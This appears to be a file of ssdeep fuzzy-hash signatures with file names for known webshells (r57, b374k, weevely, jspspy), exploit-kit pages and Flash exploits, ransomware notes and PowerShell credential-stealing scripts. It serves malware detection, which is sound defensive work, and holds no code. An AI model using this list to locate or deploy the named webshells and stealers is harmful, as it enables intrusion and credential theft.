+1536:3EKpe9mTbZJB8b2107FWcDKkg5OaBhtaHpvlHRWO:0NkTNGWcDKnrBh+lxWO,"2016-04-11-TeslaCrypt-decrypt-instructions.png"
+1536:3d3kRaakISq2NO+XjPHRReUtMbZxhH9kCSvMvEmrakOoJ/Z4uvTo:3d3KaakXNO+zpDAZxhqCg2mk+uvTo,"2016-02-15-Admedia-Angler-EK-landing-page.txt"
+1536:3d3kRaakISq2NO+XjPHRReUtMbZxhH9kCSvMvEmrakOoJ/Z4uv9ko:3d3KaakXNO+zpDAZxhqCg2mk+uv6o,"2016-02-15-EITest-Angler-EK-landing-page.txt"
+1536:3/bOs3NybwoF9Df1LR/jIQ3fQU3FT0T62dOXIc+v1PFz2vk3CHSLHR/gBtO2MGno:3/bOs3NybwoF9Df1LR/jI/U3FwT62U/8,"ss.php"
+1536:3aWjBAA2CuxyyxUG3SWGWa8+Tqoi4TqK6ispWqSTmY+EYjHTF6O8GY1+ZyDskVZI:LjBAA2C+NaXqK67STmYxK,"r57.v1.40.php.txt"
+1536:3aWjBAA2CuxyyxUG3SWGWa8+Tqoi4TqK6ispWqSTmY+EYjHTF6O8GY1+ZyDskVZ7:LjBAA2C+NaXqK67STmYxB,"r57shell1.40.php"
+1536:37GQ61rj+brlS+yJJIF0zDaopaxRX9lVkyjWERrq:3BMIF0zDaopYRxkUY,"VirusShare_a390a143b60cc044b9cd7b460f5090f1"
+1536:36TYxya5wAPeP9F3mLNvSnGFwsJGZUR28dp62VNpc8IB5rlIgnSPTCvTtKy:RxFXPePyLPwTZOm1JIgnSPhy,"body.113.127"
+1536:36TYxXERzwc1wkirrZ+SGD2r2bmUjNc1fcdbhlpxsFPgnyPTCv/tKy:RxkzJ1wkirfGKr2bJZZ2PgnyPJy,"body.113.272"
+1536:36TYxsEPw01aEwxgFkbKB2CjjnrOx17oyiFZ9Wwi5y55t5rlhgnSPTCvXtKy:Rx3oEwxgFkbyr47IoKJhgnSPNy,"body.113.233"
+1536:35E7NdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:3T,"good.php.42"
+1536:2YrEOqk2rUfboucQb89AmsjIb7YN9u31R6y5rP13+W01z:2YrL2r3ucQw9Atqy9u31d1P01z,"2016-07-20-other-Neutrino-EK-flash-exploit.swf"
+1536:2/YmYH6rIr9x09h29ir9oq9zZ9yc9nx99L9EG9Hh9KO9R5V3rd:2/jYew92949Y939d9f9x9R9l9B919/dp,"c.txt"
+1536:2Usp2k6S6lv3sFREBtn7z/Dvzn2RKgnBydq6vDioRAWkg+wx03xaJSlFNX:2DN0Psk7z7vjwBnB6q6OoR+36SFX,"2016-07-18-other-Neutrino-EK-flash-exploit.swf"
+1536:2UkcU2Y5MUXkjU9cDXwNeyFlVS7pLtaS5SAjZqGUqaxvEIa6xkYcmfxFyE0jpb27:/kd2Y57VAKfktRUA6k0pfTRVgipsBO,"2017-03-02-page-from-hurtmehard.net-with-injected-script-3rd-run.txt"
+1536:2TYnxsd6USevN+ygBeJOjts+SST36O8kQ3RQ8:6Ynxsd6veNEs+Sk8kQ3/,"PHPJackal v1.5.php"
+1536:2j9vmy7FcxH2nl0mZK8CkTO9QamWPkGPdkX3D2:2pm1B2l3CkTOiaBcG1U3K,"magiccoder.php"
+1536:2Fb/ghXXMliDJzaWRNePdzaWRNekE1OmcVUKR7cuCOo+pIdmMu6ySaYf9DGlXePd:2xsEEYzadXu6ySaatJ,"jspspy.jspx"
+1536:2EOEVhlkW9NIyOBPgC+HvhNLuYNYmgmU3uSHap5Vb11G6Baamf3:XOEVhlkCuYNYFZHa7x1tafv,"cbfphpsh.php.txt"
+1536:2c9vmy7FcxH2nl0mZK8CkTO9QamWPkGPdkX3DT:2ym1B2l3CkTOiaBcG1U3/,"magiccoder.txt"
+1536:29imU7FQlH2nlFm00CkTO9QaWeP7FP1kX3Tb:jmz92loCkTOia9DFtU3f,"2008.php.php.txt"
+1536:26TYxyaKwxv99E/3gjmCjYQDD9AhzjzlV//Yfr8wglxc2EV505rlXgnSPTCvytKy:Ix2qjkwjpYI9GPlVIfIJXgnSPky,"body.113.125"
+1536:26TYxXEuswn4VCzouuxMRLZYCONqbq7bqBdCOcvOkKQ+RVCi0gUUQgjkgnyPTCvY:Ixbs/VOYCONqbq3qBdC6+XEkgnyP0y,"body.129.001"
+1536:26TYxXEs5wcWc1pBUUvJUaXy/N6AWtXOq8RncMrMuDFqgnSPTCvytKy:Ixd51pDvJUaXkWe9qgnSPIy,"body.113.246"
+1536:1SulzGzYF2lJDm4W4rm3cumDpKfC3+zbTSrrsMqr67H:f4iQJDtprm4lZOzXSEM8mH,"2016-07-29-Magnitude-EK-flash-exploit-second-run.swf"
+1536:1Ri/NOzGHwMNqSKlEQ4XHUa8YkrXb6Y8tPFYG8/NdxSqNN:1Ri/SUKB4X0aMb69FixSqf,"2016-04-07-EITest-Angler-EK-first-run-flash-exploit.swf"
+1536:1OqnvuIJBPE2rCN1y+Ub1imOhElbrv8HQWEET7D5:rXGfUUhE5zfEb5,"b374k-2.3.poly.php"
+1536:1lDlY3QFvOMwwHaVeqje7CGmGfz+TqoiLsRVw51RpWLSTm8+EEHTQvmLpIos5Z0M:XrFvOMww8dw51gSTm8HmG,"r57_by_Mohajer22.v1.3.php.txt"
+1536:1kcU2Y5MUXkjU9cDXwNeyFlVS7pLtaS5SAjZqGUqaxvEIa6xkYcmfxFyE0jpb2a6:1kd2Y57VAKfktRUA6k0pfTRVgipsBO,"2017-03-02-page-from-hurtmehard.net-with-injected-script-5th-run.txt"
+1536:1EYdSIl0COuMAQUyQHu346gKuDubzpj+jvpTGQQOE9tD2:1EYdSIl0C8eyQM46gKuDuXt+JgtD2,"DxShell_by_Tync.v1.0b.php.txt"
+1536:18kcLrHFypcFzlV/AMFnT4BGRzekn69yh1M:9cFypcFfoATkGZtn6Ah2,"土司搞基asp大马.asp"
+1536:16vYxmitL8MTqZzOrv3KHz7HUeGFN64a0ulguPTC4dcMY:dxYMTqZzOrvS7ayguPI,"body.113.028"
+1536:16TYxyaTw7RwRhwG+NqFZWZrP1n2vz8ZKQpq6dTgO5dUbba5rlegnSPTCv9tKy:bx3QRwRCGgr9n2vqKQpDJegnSPLy,"body.113.103"
+1536:16TYxYaQHXtPgkgNokgV5deTjZE3mY01tpKc0hiKzzgnSPTCvJtS:bxS3tPzkokgmjZNA3zgnSPL,"body.113.055"
+1536:16TYxyaOwr+JGGzwVh46OkWQSyzKSNrH2CECkiFOrlPgnSPTCvttKy:bxys+JpzwV8Q50JPgnSPPy,"body.113.117"
+1536:16TYxYaDHsds/v5QifDC1tSZadqZCWYJQm26VbgJ5cuogtSPTCvJtS:bxNVv6iLCvqZXB9ogtSPH,"body.113.048"
+1536:16TYxya9w+45AAA3QHMHpLiYcTEIRK/VA0kN5rlBgnSPTCv5tKy:bxZW5qHpLI8UJBgnSP/y,"body.113.130"
+1536:16TYxXEBwLlKh7X14hLN3NU9LH+lRehPtJgGqsmb2hKm4bgnyPTCvhtKy:bxySlKhyNkkRQNpKbgnyPzy,"body.113.257"
+1536:16cD1yV9wbjFmJIgU9WH5fmr9ra89bdl3vRaeHn/FnU:16cD1yVqwHmUfu02aefW,"VirusShare_6db9acf913d08b3d4758aa27bfd757aa"
+1536:0Z+bLkrhMff4EPmzVTeFNIo3fqG95/S49lSbbF5s4FUlG0J0UsrZn2Ha2j9y:04dZmzwjPqidSIlSl5s4Uc0JVsB8Z9y,"IceSword.asp"
+1536:0pE0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:0/i,"good.php.4"
+1536:0jEytdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:0O,"good.php.29"
+1536:0iECRNdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:024,"good.php.17"
+1536:0GPTFz0m0NZ2HX/ph8zOVdMMAV9zP5dVv1Nt/yB:vPKm03cX/ph8zOVWL7RdXNtKB,"2016-07-28-pseudoDarkleech-Neutrino-EK-payload-CrypMIC-first-run.dll"
+1536:0G///////L1638k8b6mtK+uRL88QlY8E0k:d///////L8OvyZP0k,"Antichat.jpg"
+1536:0Fb/gkXXMlidJzaWRNeWdzaWRNehEQOaczUKR7cuCOo+LkD1MuHySaYf9wnlXeP9:0x/mEZtIDGuHySaPan,"403.jsp"
+1536:0EbPmVvI1wVHQSSrzuRB6NzYnCg67dARrrK6/Dsvw9u7XCZXtVlVJxDCE3g:xKrVwBkB6xYnCgOKRrrNcw9aCtfxD3g,"2016-04-13-pseudo-Darkleech-Angler-EK-flash-exploit-after-medical-library.net-second-run.swf"
+1536:09CiAj+EIvV2kMaclAZOYRdgVvdqT8lWBXXBEprxZVs12s4JScE:jiy+EIvVGlAHdY0IlMt15l,"Backdoor.ASP.Ace.et-华夏鸡专用女人2008公开版.asp"
+1536:06TYxyaHRwCujXC4MVUgVEA0qi7R7PT9ZRq85QoVOrl+gnSPTCvgtS:yxrRjuhMigVExqix0J+gnSPW,"body.113.101"
+1536:06TYxXEz88aRu1U7fqhbuJHMlDHuQTxjSyZF223gnyPTCvotKy:yxuLaRu1U7fbWlyQTr223gnyP+y,"body.113.344"
+1536:06TYxXEO88nZyHwJO3YNU+bpxqVrN4YjQQSgnyPTCv8tKy:yxbLnZyHwJRHSFQQSgnyPuy,"body.113.346"
+1536:06TYxXELkwrCyT+LJGyA6eQ8tVz0Wg5WstOjqYZngOP+SjgnSPTCvstKy:yxKks+L8y1s0XpQDXjgnSP2y,"body.113.249"
+1536:06TYxXEHVBwUyXBtrhVg3CkMFVscWfU5tmH4OYMw17QLIPSWgnyPTCvwtKy:yx2VB+XBtrDg3kVsckUlV72WgnyPqy,"body.113.260"
+1536:06TYxXE+88JA0qIWFEqKKDZg/J24gI2Y4GLa3WgnyPTCvMtKy:yxDLJv3WFEqKzBWp3WgnyPiy,"body.113.367"
+1536:06TYxIoCtTX1G1F1yYZYdRXWOLUmeH+yyqYIlkzb+SguPTCvm:yxaIn4YZYdRXWOLUA+SguPt,"body.113.034"
+1536:04XT0V4HtZAyWUPCVuUdCVuUFsNlzZxolsxNtKx8lDsNaAe7e4eyWC4exfeyfeqJ:06SOAyVsNlcl4lF,"2016-08-12-page-from-dakarvoice.com-with-injected-script.txt"
+1536:04ax2Y2NktX4oL9Mt2luknt9JW1j0d/I8DwdSRi4UJMdEHy9WhpyUdbrGJyT:Yx2Y2NkMtdjT8DwdViEN,"HackArt_EngShell.v9.9.php.txt"
+12:ZWofi1mTJTnQeu8MYpFg09s5Wypl/+zxwuE8gwuE12Em9rionBfdB6vcGG:ZfacFTRufg2WzWwgw4Eg5Bfdh,"up.php"
+12:ZWBiKm71mTa4Ngri0SMfBWQsvxM7RbQNgsw4DQUJkMtf:ZGij7cu4NgjnFsvmRGgsw4DQUJl5,"list.php"
+12:zkXCyDmJ6XJsTpEzESECLOfrvGAeYgw9QoQvCBZVE6mF8HBNaUMe+Jhw8fvNMno4:QXCDOsTpJ8LOToYgw9QrsVJkrTrSnowf,"12bf2f8a.php"
+12:zkXCyDmJ6XJsTpEzESECLOfrvGAeYgw9QoQvBONrOxYeyUv8aKuV:QXCDOsTpJ8LOToYgw9QreXeLyuV,"listing2.jpg.php"
+12:zkXCyDmJ6XJsTpEzESECLOfrvGAeYgw9QoQvBO8B1kyUfblyeV:QXCDOsTpJ8LOToYgw9QrTe7blyeV,"listing.jpg.php"
+12:zjjjfXL9h6z0aPz03ZWJ10+tzMhjY+oAfgXmjzFL:zPjfXL9hpaPg3Zs10+tzMh3dIXmlL,"malshell22-4.txt"
+12:ZgxNgjAa3Azw8RNS8lroexUW5WCtUq2A+hYKLoQpb9I23Ttn:ZgxCEawMYNJlro+UW5WC2q2nhdLoKS2h,"obfs2.php"
+12:YqWzesHZqjObyCIFXaYcm8zsVzAV2cMijhK6oQLGECorJBR6pxoTHnvKmw+YeCBz:Dwl0XBwYcVbMKirECGgpUHvKmw+z4bp,"2016-07-13-Bandarchor-decrypt-instructions.txt"
+12:YqWzesHZqjObyCIFXaYcm8zsVz6Bm2cMijhK6oQLGECorJBR6pxoTHnvKmw+YeCx:Dwl0XBwYcubMKirECGgpUHvKmw+z4bp,"Pizzacrypts Info.txt"
+12:ylcoa1T0ajRjHT1BWLoc67LFQysOw0F6Gb:ea1TvLTDWiLPsOVR,"calc.xslt"
+12:YgzEDKe6b3rv2TmjUliv/LTa6A/27/WCw25COMCGEyFxbdJifO6ireYPw/Vu4zK0:YkQli3LdPr5COrGEail9V/mwAYa3l0J,"badne.php"
+12:yGiWdOllolVBbtB3ccRvAl5hWHMvB0GRBcNqizWprJzm0QRJzfUtzWACX:yYt3/hbZAHhWHO0GqkizWFJvQRJbUtz8,"tasklist.vbs"
+12:xzcJYEejVNcKbwT/KsiwXBdXiCTgywQCTGTGqNTdfiMgeIzWf7dS0F1BnYleAs4c:4YEejVVbW/PDXi5QCTGTGqNTpEodS0FP,"ejV7Yxx6"
+12:XxGePh4JcK9vBJahvYTttYX/cf8B6YHLY71rHuytD3TBso13lAcaUcex7:weeKGT3YPgYYBrHu+D3TBso1VJt7,"oracle.txt"
+12:XVjL6l7xSD9xEByBs+AmuQQcMeLe7Nzass9AVa6HFgjh8Vwi+Uuivtnr9I9qN:XVn6RYO0BsHmuQQcMJaU4yZ+zWnC8,"d3bb212a6f6c0907541e6fa6fa813d0d_php.txt.orig"
+12:XSV7gEI8krXBddNtNNpBLCQqzWnViwAUNNDhYE2vMhYYLN+iL4QR0wR1VtOAEw1C:828OXBdH77BLpqqAUN52C2efLzRbVLC,"ExetoText.ps1"
+12:xSJNnyA9/ccPzWYAydWDjpmkWwEYNx7JAgSP1QJu:QtJRzCtIajMkWN27JA71QJu,"maysa.txt"
+12:xSJNnyA9/ccPzWXAF8zKHAb7dWDjPOmkWwEYNx7JAgSP1QJu:QtJRzCXJ+eajmmkWN27JA71QJu,"inbox.php"
+12:xSJNnyA9/ccPzWw5dWDjpmkWwEYNx7JAgSP1QJv:QtJRzCUajMkWN27JA71QJv,"2016.txt"
+12:xSJNnyA9/ccPzWUQdWDjpmkWwEYNx7JAgSP1QJu:QtJRzCUyajMkWN27JA71QJu,"bulova.txt.1"
+12:xSJNnyA9/ccPzWSBdWDjpmkWwEYNx7JAgSP1QJu:QtJRzCSLajMkWN27JA71QJu,"provull.txt"
+12:xSJNnyA9/ccPzWnddWDjpmkWwEYNx7JAgSP1QJu:QtJRzCn/ajMkWN27JA71QJu,"VirusShare_ae51bfac547a42943b9f42bde51a69a3"
+12:xSJNnyA9/ccPzWndAKdWDjpmkWwEYNx7JAgSP1QJu:QtJRzCnHajMkWN27JA71QJu,"555.txt.002"
+12:xSJNnyA9/ccPzWnd76KdWDjpmkWwEYNx7JAgSP1QJu:QtJRzCnJHajMkWN27JA71QJu,"555.txt"
+12:xSJNnyA9/ccPzWFMQdWDjpmkWwEYNx7JAgSP1QJu:QtJRzCiyajMkWN27JA71QJu,"maysa.txt.002"
+12:xSJGnyA9/ccPzW+dWDjL1mkWwEYNx7JAgSP1VUYu:QOJRzCsajMkWN27JA71zu,"ds.txt.1.001"
+12:XSC59um/lzLbNROMoqUKLbzmis07zWnViwPG4n1DhYYdFMh8OXvhLL1o8Y6x:NtRLb3OXqUKLPmX0qP5x2vW+hL5iw,"TexttoExe.ps1"
+12:+xNgoezHJkYd1TlZ0NB/oLKUW6CEN/odkQENB/EFU5jCo5QpngAzM32ruGk4M7wK:+Hgoep/I5U3CQodkQMcFU9C6Qhg3vOUh,"bootstrap.java"
+12:xmh08CGhQMEjDMWyxqJUQSLVQTE+A/VkpBdYNyn:qxCGhGjm8TcVQzg4Bfn,"php.class.php"
+12:x9KaureyYls+TmAgcCgTwXLjV1WSWyplXN:yGUA3T+Dt,"极其隐蔽的pHp小马穿插在正常页面中.php"
+12:x7fYEejVNcT/KsiwXBdXiCTgywQCTGTGqNTdfpxqIzHfFNAo81T6YleAs4or:1YEejVQ/PDXi5QCTGTGqNTrQEddue4c,"zxcvbnm.php"
+12:X4YcP+1vXAfYnLLh3wAUEXi+9i+tvV+6iPgCjyimkDgii+/FR+XylyiAia9WdF:KP+18YnLlAAUvv+tvVK7D1xNRuyba9q,"Get-WLAN-Keys.ps1"
+12:X49/zwuV1p0OgU/CGQz5mLV5oKSK2wx6DhYhOG+4Clcf:YwI1YUT68L7xE2m4Cle,"Speak.ps1"
+12:x1XCXgQSgssBGbxBKPyOibTv+6M8AGYu9Z506IsNW/mXya:HXCXdS3r0yOyb+OjYG5j7N4uL,"fee4181443c7299d710d3036451418e4"
+12:wXBssko3HJMXmnyMPY38XTN8PKjdSU0UBQf1wHsNBkDFK8Xyqm7vJUgS8PB4SHML:oBsskoXaXOBA3QSvUfB7HnUFqk+gSIK,"Usage.md"
+12:wXBSaOsko3HJMXmnyMPY38XTN8PKjdSU0UBQfvMHsNBkDFKQ+qm7vJUgS8PB4SHK:oBSFskoXaXOBA3QSvUfB1HnUrqk+gSIK,"Usage.md"
+12:wXBosko3HJMXmnyMPY38XTN8PKjdSU0UBQfAsNBkDFKtrqm7vJUgS8PB4SHML:oBoskoXaXOBA3QSvUfBrnURqk+gSIK,"Usage.md"
+12:wXBCpFbsko3HJMXmnyMPY38XTN8PKjdSU0UBQfesNBkDFKJz:oBC/bskoXaXOBA3QSvUfBrnUJz,"Usage.md"
+12:wXB/7Pysko3HJMXmnyMPY38XTN8PKjdSU0UBQfme4sNBkDFKfemqm7vJUgS8PB49:oBzPyskoXaXOBA3QSvUfB5nUzqk+gSIK,"Usage.md"
+12:wXB3fK5bsko3HJMXmnyMPY38XTN8PKjdSU0UBQfyK6HsNBkDFKvK8qm7vJUgS8PW:oB3EbskoXaXOBA3QSvUfBtHnUzqk+gS9,"Usage.md"
+12:WUSMG1y/aoT5NSJp+mpl6raQhGgyVBJ2oHlnALe80Siht0GOMtmY:WUS10/ayeJ12HyV/4eRSU0GOM4Y,"weevely-1.1-cookie-password-1-obf.php"
+12:WujVRAE4vrgVAXakbkMJavwacuGQwE5LIBICH3YTo/HMsFs42:WyjNVAXa7MUBxGC58B9XNMx42,"本地连接这个.php"
+12:WqBCuJyyyyyyyyyyyyyyyysyy2dcYyyyyyyyyyyyyyyy2WcYyyyyyyyyyyyyyyyW:WqBfrdZWZsd6hLoEoKTZdxZ21C,"php_niu_3.php"
+12:WiUz096LhUhUhrUG2m2EsehQzOXCcCriVzKtwPXp7gT3KC0k4ME:We6LhfGQQzquidnXtmt4d,"include.php"
+12:WhycAyvnbfq4bJblBCBr+lHWyplL90giPMbVIQ6CC+1WTfAZ:WhxA8bCJBomVmGNCp1WTAZ,"class-wp-upload.php.1454842031_1.001"
+12:WGzW1fKHOaiKdWDj0mkWwEYNx7JAgSPdGu:Wz1fKH3ajLkWN27JA7Uu,"testesites.txt"
+12:WEPRnEq4YW7EO8BBzLO80s68ALO8II7BgfZCOPPzZ:WE5EDLSEZMBzZ,"Non-alphanumeric.php"
+12:WDapKs49zZ5RVTYC0mrG+IrcPbs1pCEmuSWw:WKKpd5amFwe7Ww,"fancybox?"
+12:WcO74W8MHdyhkcEJUDbyljQV9Ud8zd8Z2NWY+PHK9ot:WLrZdDVljr1Y+Sk,"xslt.php"
+12:WcJ/HUYNXmIvxwYfVISjvU6EYNx7E2LYNx7BAgjUlFC47kzKVyIzVPA1KV:W0/0gXmIvfqwvU6E27E2L27BAEkCJmXF,"testavul.php.1"
+12:Vz35tbeUhJD4lSr5Q/njSOtIzWtbhUsQPs6YIJ2nAKP:V/z/4lNjSOtsWpWsKsfIwpP,"2016-07-08-page-from-eielectronics-with-injected-script.txt"
+12:UZTx2eXU3kX7IjkJuNSTXzsQ4ECa7ZRPriCn:7IjZJukTXQQjVPrr,"16e05d5794d1480a4b6f58acbdde368f_php.txt"
+12:UZTx2eXU31n+Ij1mmSTXzsQ4ECa7ZRPriCn:7IAzm5TXQQjVPrr,"22dbaec2ea17c62e87903d556793dec8_php.txt"
+12:UZTvQMY1EQMvTqlaqTjRw7klnps9X3jXoucqy7p+rWxzHj+5w/dcV:cQJpYRq+QK9DXIFGWxzHjmwE,"31a81e0566668c699c5112bb4b6abe90_php.txt"
+12:UZTS39Y2hcmXQSsH+XQSfFKh4G1N/EZ2s9Y2xcWXQSMH+XQSf1Kh4G1tS:F9Y2hcQQwQ6Qh9NMP9Y2xcgQgQ6gh9g,"70b3883e9f1a89990cb9a4eb30f4541a_php.txt"
+12:UZTrTV3RnmUVfz765pCf+g+5pCvO51C+5VNM5jrJjd0SGQ:OTFRnFVfz724f+g+54vy1C+5VNM5ZJ0q,"abdbfd2cb93a277e910a2c9c62c3028a_php.txt"
+12:UZTRp1j2NhU2zP1+5j2FNP1Hcj2ltW1AGKj2N3SZ1/z/81/Cszj2tk15o8j2eQl4:G1md84NTA3Snz/6CsiJt4pDjDSQ,"692dc5441807725571af42029d48a89e_php.txt"
+12:UZTQPRQYVfFPYBnloxYM2k+qIAvUzdW9ibsoj3wpPBYXY4xxrhzdpMzrab:b2okdk+qIAvUzvbjcpiZhRh,"198409a2cfbf8adbb703a3881d2bd6c3_php.txt"
+12:UZTPT1DjMJCGz3MEjDMWyxlQQglGctTE+OGpSdu5GpNr0Nat:0MJCGzLjmQQgl1zhpSAkpNr0N6,"28534c43ac11a651a41e630cb206eec7_php.txt"
+12:UZTPH6GAUPaAANeu6wy/zUPaAARV0RUgvmNKzuzjC6LO5Sf4R8GPaAAU0RUgvmNS:+HyUNANeu6wy7UNA7geK+C6uSWNA4geS,"d92a433240e792c445415d2813284e37_php.txt"
+12:UZTOoJAQYMMuTJc/efnYNx7LneZ0fCmDWhXhprPk:FMsefn27L2/oghe,"579485e484e90652d545fa2322e3f853_php.txt"
+12:UZTBfpk20U6KcpInmKvqKPg3DLakfxHaH0Ad5HlS85RtRK2e+56dUTR/K2do+N2:ufpBDLcqnmKvqKo37fAd5HBLo2edWTF0,"4b6a747cdeabff16576745a0f07d602e_php.txt"
+12:UZTBEBKLdGHAqNIUc2B4/EeDKNuJsyix9C9EaboWnBiCn:RAXqa5wqeQCyi3CGab7Br,"a2316fd5cb36c68e746367c659394fd6_php.txt"
+12:UZTB3xjAqNIUc2B4/EeDKNuJsyix9C9EaboWnBiCn:C8qa5wqeQCyi3CGab7Br,"d3bb212a6f6c0907541e6fa6fa813d0d_php.txt"
+12:UZTB3AqNIUc2B4/EeDKNuJsyix9C9EaboWnBiCn:fqa5wqeQCyi3CGab7Br,"84b35cec7c95fbe666943f6937e938e1_php.txt"
+12:UrDa8mb5CikR0DFrj+svGlC9oxFHWRgRl8/x0PxhqXHeA9DLqJmW0FJR1L:UrGH5kRyl6svdXsl40oJ1L,"jsquery.php"
+12:uMWKLeVFzWJlddUnnQp/UWXmIvxwYfVI+mkWOJx76EYNx7JAgSN1Cu:3qWJl/UnysWXmIvfqRkWOJx76E27JARL,"mailer-kazzu.237-inside.php"
+12:UkSJnejLlZEIASVXvALFJPNxEIASCkGbWcGTyaDUhOksl2cYlzhAkAUjAtCx3u:ECZEIZXvE7vEIQgyaEOkswJlhvxjxxu,"NTFS.h"
+12:UK1cNcBaRaFTEMU168f6qA5Ia0yushE16CtBE9sn:gNNkdaf675ICuPt9,"过各大杀软的pHp一句话.php"
+12:UGG8TA2+YNMdT+5rSHM5IKAwjSMZtzNKbnsT/bKIvmAYZLHtn:q8oFlwRZlkslvmAYZbt,"style.css"
+12:uDhRqLLSJRKIbUphiSuen0WEdH/RTElMvW8hgWJgkdRXfDYWuJjPxN:MvX9YFn0DNZTEmW8hgOgM7Ytb,"paxmac.jspx"
+12:uDhRqLfUUphFcehW6x5PTph+IdaThsj0Z2R4EJ9CwJwLfN:MMPVJ3PTph+LTqLR4GCwAV,"jw.jspx"
+12:uDhRqLE59RKI+UpLNZ2u8fuebui4GofXMvgp4xxA2yYlw60qIowj4XvopWp9:Mp5L9/eMXRiTAtYF9wj4L,"base64.jspx.txt"
+12:+UDbR11Wsvf6z9g6WfHuwyAUwsh2OFH/lcNkcSwml:5F1diza6WGwyAfG2OFeSjFl,"CHANGELOG"
+12:UcRn9q4YW7t7O8BBwO80s68jO8II7BgC1OPPzmQ:U69DLt/o6zr,"Non-alphanumeric.php"
+12:u7o05e/WfHq3MQowP40UgbsTuNhErZZeFUK047zwpe/E5hMaqFUK0l4hKXGVp:us0A/WfHqch0UMsTAhIMFD7T/E5hTqF9,"6173e106b929b82f8f23ee0714bf77e6.aspx"
+12:tWRaM+fkLoCKGk1MVbAyzZ74zPaHkE4NsXRmo3Ma3:YRa98LomyU3zFsPaEE4NsXRmo3Ma3,"hatz.php"
+12:TWgWxB+xNRwKlTAbrRCzxB+x0uRwwxB+xv0ZE3nR6JTLKvn:TciwKebrR+ywWlZInMQvn,"__init__.py"
+12:TV7z5e/YcyAE05e/jq87QffEOWYF2wFGAwWOfRwgWH+k:5fA//yAE0A/jq8EVJ0AwWO5wg0,"ASPX一句话"
+12:tTDBqJmuLxjsbAedVnn4JJUhEoeAGxEnuV4AuPYTV5OL:5e3xWaoelETXjL,"php_backdoor.txt"
+12:TMHdR991eLEz4A2qd0iwfblNqMvcFELx2BADx2VVex25x2aTx24SxsXwXZeLwj:2dRLCbnvCrpZXO,"Get-VaultCredential.ps1xml"
+12:tlWnwjcmiuwFtPBGOWZvX4WFSd3ghTnuAlNvVJFBwYhH+3oeIcNhkMrLAUlD1zQo:wwjB4gphXfSd34qUNvVfBrsYeIchkMrR,"2016-08-10-Magnitude-EK-flash-redirector.swf"
+12:tkLu2yKpV2DMGXSN3an6R0ETZ31uERPZQkwoCiGkF9sYM:+LiK/OHXSO6eETZFuERCkpCVkgd,"sep16-2.txt"
+12:tjufRUAAROWXm7xwYfVISuUeQX56BX5ve4DkWOJx76EYNx7JAgZd7eqGl:thAFWXm7fqjUeQX56BX5PDkWOJx76E2s,"20144.php.002"
+12:tbP0+Y2KHQ9H6jaxzZc8gT90hIpAFMPhulLPYb:JP2Cq6zZc8s4q5ulLQb,"teste.php.1"
+12:T96QclfhG1CMxCaizELF9PnK5LcqJmIGVUELF9PnMMWPGb:5spG4MxCaiG32nTGVr3MMf,"2016-02-03-vyetbr.tk-hot.htm.txt"
+12:T96QclfhG1CMxCaixxysd7SRMgdtuETWHJ+LcqJmIGVkxysd7SRMgdtuETWHJi/6:5spG4MxCaixUsd7oMgjA+nTGVkUsd7oK,"2016-02-15-zeboms.tk-show_content.php.txt"
+12:T96QclfhG1CMxCaiFMwmEYLcqJmIGViMwmE6MWPGb:5spG4MxCai2/vnTGVv/PMf,"feedero.tk-api.php.txt"
+12:T96QclfhG1CMxCaiE/zl0u5YdeYqgCCLcqJmIGVR/zl0u5YdeYqgCm/MWPGb:5spG4MxCaiEltYNqtCnTGVdltYNqtgMf,"2016-01-26-en.robertkuzma.com-home.php.txt"
+12:T96QclfhG1CMxCaiEYUUSdOLcqJmIGVRYUUSdEMWPGb:5spG4MxCaiABcnTGVlBWMf,"2016-01-25-www.bobibo.tk-hot.php.txt"
+12:svYSBT8GC+l2TxKZ5zufJ5Q3ATKaJxN7dcQHR5Bg3SRIatwnOY/:sQzDTxbfn3+SzR5B0SRqOY/,"mod_perl.embperl.shell.htaccess"
+12:svYSBT8GC+l2d8FgNtQMJtVGz6QxDA4RFtVGrtSMkUP/tRZ:sQzD6gjQMJtVReRFtVRwtz,"mod_php.shell2.htaccess"
+12:svYSBT8GC+l2485zufJ5Q3ATKaJxN7dcQKQFqGe2Q+Q+kBu2BuEV37Cn042:sQzD4bfn3+S209IZ542,"mod_python.shell.htaccess"
+12:svYSBT8GC+l2485zufJ5Q3ATKaJxN7dcQKQFqGe2Q+Q1XOYmI2JGA96DNZwgy9+o:sQzD4bfn3+S20Ol2JGQ6DIgy9+W68+e,"mod_ruby.shell.htaccess"
+12:svYSBT8GC+l2485zufJ5Q3ATKaJxN7dcQHRk3QTZp9M0:sQzD4bfn3+SzR4Q9M0,"mod_perl.shell.htaccess"
+12:SuYHeb6LO5SfjG0vG2+5BM8CnasPPR1y8xvqXpk:TYHa6uS7zu2+3CnNXm8lq2,"webshell-cnseay-x.php"
+12:ST7EIbeADMSFsp2xKRPFs+nxKl0VezX7qW1aDBM4TanCryBZvp:Q4meAJYRnYyVe77q6E64+CWR,"PHP reflection.php.txt"
+12:sn9uAUcRDbMHHwBQTfcWPOXfbMHHE/TN58WPOXfbMHHcbYfYx91WPOIWPeO5qoWp:RRnPqTpP8biY7QAz5qBp,"password.txt"
+12:SMRjuGB/AID2P4qaJKOWDjcAmCihau4YNx7b2Ag9IvjBG1tkWwEYNx7JAgEGe5G1:ZvB/AtwqIFajcA10P427b2AD18tkWN2V,"t.php.3"
+12:SMRjuGB/AID2P4qaiKOWDj+kmCihaulYNx7b2Ag9Jv0vjBG1tkWwEYNx7JAgEGeW:ZvB/Atwqxaj+k10Pl27b2AOv018tkWNW,"t.php.1"
+12:SMRjuGB/AID2P4qaiKOWDj+AmCihaulYNx7b2Ag9Jv0vjBG1tkWwEYNx7JAgEGeo:ZvB/Atwqxaj+A10Pl27b2AOv018tkWNo,"t.php.2"
+12:SMRjufXKUAw66I+rqKARQOWXm7xwYfVISuU7AosPQX56BX5v2NDkWOJx76EYNx74:ZeTAKI+rqKGWXm7fqjU7cIX56BX5+DkF,"x.php"
+12:SLk3UzI8sGq3L9NuwlAdTCjL+SA4XS2NOYtu5ZSl:WzIt3BQEApCjiSrS8wnSl,"connector_t.phps"
+12:sLaAqh47yK7yWO1R02c5GUHDdVt3zVyVV5mknoBf7V5ElUVL:qaTC2CyD1m5fkeffEa,"httpHandlers.md"
+12:SdTwh3nx+c0Akk39aWg+rlZqxbCaOxT/YnmEcrPrxSx44I0g1v3C:SanUcvkk30zCaO+9ElSzYC,"Readme.txt"
